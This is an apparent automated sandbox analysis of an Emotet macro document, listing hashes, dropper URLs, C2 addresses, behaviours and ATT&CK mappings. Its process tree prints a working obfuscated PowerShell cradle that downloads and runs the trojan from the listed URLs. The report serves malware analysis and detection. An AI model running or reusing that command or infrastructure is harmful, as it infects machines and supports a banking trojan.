emotet | e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e

General

Target

8a7c7754_OUZnG00tUJ.doc
Size

176KB
MD5

8a7c7754300dab0670eaf86357a5463d
SHA1

6feb3edf05a2170772cdaef20d76b7e8e07c7b81
SHA256

e9325a711e0f6f605b85898c5b507d4320e1f1dc672c68172b06cda359b5107e
SHA512

3075f82c4530f5b9681c5b4979faf04fee0f82af288556c97b3e534abdac8290937af2f6e915f49625f9c0b4f6375b565eb9ef8aacb548ea0a29068ecad51eb2

Score

10^/10

emotet epoch2 banker trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://santyago.org/wp-content/0mcYS6/

exe.dropper

http://dandyair.com/font-awesome/rOOAL/

exe.dropper

https://www.tekadbatam.com/wp-content/AUiw/

exe.dropper

http://kellymorganscience.com/wp-content/SCsWM/

exe.dropper

https://tewoerd.eu/img/DALSKE/

exe.dropper

http://mediainmedia.com/plugin_opencart2.3-master/Atye/

exe.dropper

http://nuwagi.com/old/XLGjc/

Extracted

Family

emotet

Botnet

Epoch2

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	2448	powershell.exe

Emotet Payload 5 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/4648-390-0x00000000021B0000-0x00000000021C2000-memory.dmp	emotet
behavioral2/memory/4648-393-0x00000000021D0000-0x00000000021E0000-memory.dmp	emotet
behavioral2/memory/4648-395-0x00000000001E0000-0x00000000001EF000-memory.dmp	emotet
behavioral2/memory/4752-398-0x00000000004C0000-0x00000000004D2000-memory.dmp	emotet
behavioral2/memory/4752-401-0x00000000004E0000-0x00000000004F0000-memory.dmp	emotet

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
19	3604	powershell.exe
22	3604	powershell.exe
32	3604	powershell.exe
34	3604	powershell.exe
36	3604	powershell.exe
38	3604	powershell.exe
40	3604	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Dzdsyqxb.exeKBDOLCH.exe

pid process

4648 Dzdsyqxb.exe
4752 KBDOLCH.exe
Drops file in System32 directory 1 IoCs

Processes:

Dzdsyqxb.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe Dzdsyqxb.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4648	Dzdsyqxb.exe
4752	KBDOLCH.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe	Dzdsyqxb.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1456 WINWORD.EXE
1456 WINWORD.EXE

pid	process
1456	WINWORD.EXE
1456	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exeKBDOLCH.exe

pid	process
3604	powershell.exe
3604	powershell.exe
3604	powershell.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe
4752	KBDOLCH.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3604 powershell.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

WINWORD.EXE

pid process

1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE
1456 WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	3604	powershell.exe

pid	process
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE
1456	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powershell.exeDzdsyqxb.exe

description	pid	process	target process
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 3604 wrote to memory of 4648	3604	powershell.exe	Dzdsyqxb.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe
PID 4648 wrote to memory of 4752	4648	Dzdsyqxb.exe	KBDOLCH.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8a7c7754_OUZnG00tUJ.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -en JABUADEAeAB5AHkAeQB4AD0AKAAoACcASwAnACsAJwBrAHkAbQAnACkAKwAoACcAXwA0ACcAKwAnAGsAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AVgA6AFUAUwBFAHIAUABSAE8ARgBpAEwAZQBcAHUANgB3ADcATwBfAGwAXABQAFMAagBrADMAcABOAFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAQwB0AE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAFUAUgBpAGAAVABgAHkAUAByAG8AVABvAGMAYABvAEwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAxADIAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAxADEAJwApACsAJwAsACcAKwAoACcAIAB0ACcAKwAnAGwAcwAnACkAKQA7ACQARQByAG8AcwAzAGYAYwAgAD0AIAAoACgAJwBEACcAKwAnAHoAZAAnACkAKwAoACcAcwAnACsAJwB5AHEAeABiACcAKQApADsAJABHAHIAdgBuAGYAcwAzAD0AKAAoACcARAAzAGIAcwAnACsAJwBvACcAKQArACcAbQBmACcAKQA7ACQAQQBrADEAYwBkAHcAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAEYAJwArACcAeAAnACsAJwAyAFUAJwArACcANgB3ADcAbwBfAGwAJwApACsAJwBGACcAKwAoACcAeAAnACsAJwAyAFAAcwBqACcAKQArACcAawAnACsAJwAzACcAKwAnAHAAJwArACgAJwBuACcAKwAnAEYAeAAnACkAKwAnADIAJwApAC0AUgBFAHAAbABhAGMARQAgACAAKAAnAEYAeAAnACsAJwAyACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACsAJABFAHIAbwBzADMAZgBjACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABZAHMAZQBtAF8AcwA0AD0AKAAoACcATgAnACsAJwBnAGMAJwApACsAJwBtADcAJwArACcAdgBrACcAKQA7ACQATgBjADIAeQAwAG8AMgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBjAGwAaQBlAG4AdAA7ACQASAA1AHQANQA1AG8AawA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBzACcAKwAnAGEAJwApACsAJwBuAHQAJwArACgAJwB5AGEAJwArACcAZwAnACkAKwAoACcAbwAuAG8AcgBnACcAKwAnAC8AJwApACsAJwB3ACcAKwAoACcAcAAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlAG4AJwArACcAdAAvACcAKwAoACcAMABtACcAKwAnAGMAWQBTADYAJwApACsAKAAnAC8AJwArACcAKgBoAHQAJwApACsAKAAnAHQAcAAnACsAJwA6AC8ALwBkACcAKQArACcAYQAnACsAKAAnAG4AZAAnACsAJwB5ACcAKQArACcAYQBpACcAKwAnAHIALgAnACsAJwBjAG8AJwArACgAJwBtAC8AZgBvACcAKwAnAG4AdAAnACsAJwAtAGEAJwApACsAKAAnAHcAJwArACcAZQBzAG8AbQAnACkAKwAoACcAZQAvAHIAJwArACcATwAnACkAKwAoACcATwAnACsAJwBBACcAKwAnAEwALwAqAGgAdAB0ACcAKQArACgAJwBwAHMAOgAvACcAKwAnAC8AdwB3AHcALgAnACsAJwB0AGUAawAnACsAJwBhAGQAYgBhAHQAYQBtAC4AYwBvACcAKQArACgAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAnAHQALwAnACsAKAAnAEEAVQBpACcAKwAnAHcALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAGsAJwArACcAZQAnACkAKwAoACcAbABsACcAKwAnAHkAJwApACsAJwBtACcAKwAoACcAbwByAGcAYQBuACcAKwAnAHMAYwAnACsAJwBpAGUAJwApACsAJwBuAGMAJwArACgAJwBlAC4AJwArACcAYwAnACkAKwAoACcAbwBtAC8AdwAnACsAJwBwAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwB0AC8AUwAnACkAKwAoACcAQwBzACcAKwAnAFcATQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAcwA6AC8AJwArACcALwB0ACcAKQArACcAZQAnACsAKAAnAHcAbwAnACsAJwBlACcAKQArACcAcgAnACsAJwBkACcAKwAnAC4AJwArACcAZQB1ACcAKwAoACcALwAnACsAJwBpAG0AZwAvAEQAQQAnACsAJwBMAFMAJwApACsAJwBLACcAKwAnAEUAJwArACgAJwAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAG0AZQAnACsAJwBkACcAKQArACcAaQBhACcAKwAoACcAaQBuACcAKwAnAG0AZQAnACkAKwAoACcAZABpACcAKwAnAGEAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwBwAGwAJwApACsAJwB1ACcAKwAoACcAZwBpAG4AXwBvAHAAJwArACcAZQBuACcAKQArACgAJwBjAGEAcgB0ACcAKwAnADIAJwApACsAKAAnAC4AMwAtACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAcwB0ACcAKwAnAGUAcgAvACcAKQArACgAJwBBAHQAeQAnACsAJwBlAC8AKgBoACcAKwAnAHQAJwApACsAJwB0ACcAKwAoACcAcAAnACsAJwA6AC8ALwAnACkAKwAoACcAbgB1AHcAYQAnACsAJwBnAGkALgBjAG8AJwArACcAbQAvAG8AbAAnACsAJwBkACcAKwAnAC8AWABMAEcAagBjAC8AJwApACkALgAiAHMAUABgAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUAAxAHAAZwBiAGwAagA9ACgAKAAnAFgAaQAnACsAJwA2ACcAKQArACgAJwBiACcAKwAnAGkAaQAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAWABoAHoANwBuAGsAbQAgAGkAbgAgACQASAA1AHQANQA1AG8AawApAHsAdAByAHkAewAkAE4AYwAyAHkAMABvADIALgAiAGQAbwBXAE4ATABPAGAAQQBkAGYASQBgAEwAZQAiACgAJABYAGgAegA3AG4AawBtACwAIAAkAEEAawAxAGMAZAB3AHEAKQA7ACQAWQBrADEAMABzADEAXwA9ACgAKAAnAFMAJwArACcAbgA1ADAAcAAnACkAKwAnAHAAagAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAQQBrADEAYwBkAHcAcQApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMQAyADMAOQApACAAewAmACgAJwBJAG4AdgAnACsAJwBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABBAGsAMQBjAGQAdwBxACkAOwAkAFkAOAB6ADkAMABnAHgAPQAoACgAJwBJAHEAMgAnACsAJwB5ACcAKQArACgAJwAzAF8AJwArACcAawAnACkAKQA7AGIAcgBlAGEAawA7ACQAUwBvAHYANwBsAHYANwA9ACgAJwBSACcAKwAnAHMAJwArACgAJwB6ACcAKwAnAHIAawBuAHIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAdQBrAGwAYwBxAF8APQAoACgAJwBCADEAZwAnACsAJwBrACcAKQArACcAaQAnACsAJwBkADkAJwApAA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3604

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe
"C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4648

C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe
"C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4752

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\U6w7o_l\Psjk3pn\Dzdsyqxb.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
C:\Users\Admin\u6w7O_l\PSjk3pN\Dzdsyqxb.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storage\KBDOLCH.exe
MD5
3c429a72611aa11d54a78008d531e232

SHA1
66979ad58f8447912d1c6b1195e22fd5e5aa7dd5

SHA256
ef503d5f5a41649720ea8bd5ed226aff3927ecd4c8fd80666ac2fda9d1c2e6cf

SHA512
9c6b021bb99e2530eab6d9896c5f08ad1a5185e75f4de447be0c4a39ba800762dbd7b1ad68662c07cf596099c5107f011336b0226e469f6f86e1d42043eacb85

Download Submit
memory/1456-123-0x00007FF89BB20000-0x00007FF89DA15000-memory.dmp

Filesize
31.0MB

Download
memory/1456-116-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-118-0x00007FF8A3BD0000-0x00007FF8A66F3000-memory.dmp

Filesize
43.1MB

Download
memory/1456-122-0x000002BB4CC70000-0x000002BB4DD5E000-memory.dmp

Filesize
16.9MB

Download
memory/1456-114-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-275-0x000002BB5D1E0000-0x000002BB5D1E4000-memory.dmp

Filesize
16KB

Download
memory/1456-466-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-119-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-465-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-464-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-463-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-115-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/1456-117-0x00007FF882460000-0x00007FF882470000-memory.dmp

Filesize
64KB

Download
memory/3604-284-0x0000021F1FB30000-0x0000021F1FB31000-memory.dmp

Filesize
4KB

Download
memory/3604-311-0x0000021F07876000-0x0000021F07878000-memory.dmp

Filesize
8KB

Download
memory/3604-290-0x0000021F07873000-0x0000021F07875000-memory.dmp

Filesize
8KB

Download
memory/3604-289-0x0000021F07870000-0x0000021F07872000-memory.dmp

Filesize
8KB

Download
memory/3604-280-0x0000021F077F0000-0x0000021F077F1000-memory.dmp

Filesize
4KB

Download
memory/4648-390-0x00000000021B0000-0x00000000021C2000-memory.dmp

Filesize
72KB

Download
memory/4648-393-0x00000000021D0000-0x00000000021E0000-memory.dmp

Filesize
64KB

Download
memory/4648-395-0x00000000001E0000-0x00000000001EF000-memory.dmp

Filesize
60KB

Download
memory/4648-386-0x0000000000000000-mapping.dmp

Download
memory/4752-396-0x0000000000000000-mapping.dmp

Download
memory/4752-398-0x00000000004C0000-0x00000000004D2000-memory.dmp

Filesize
72KB

Download
memory/4752-401-0x00000000004E0000-0x00000000004F0000-memory.dmp

Filesize
64KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads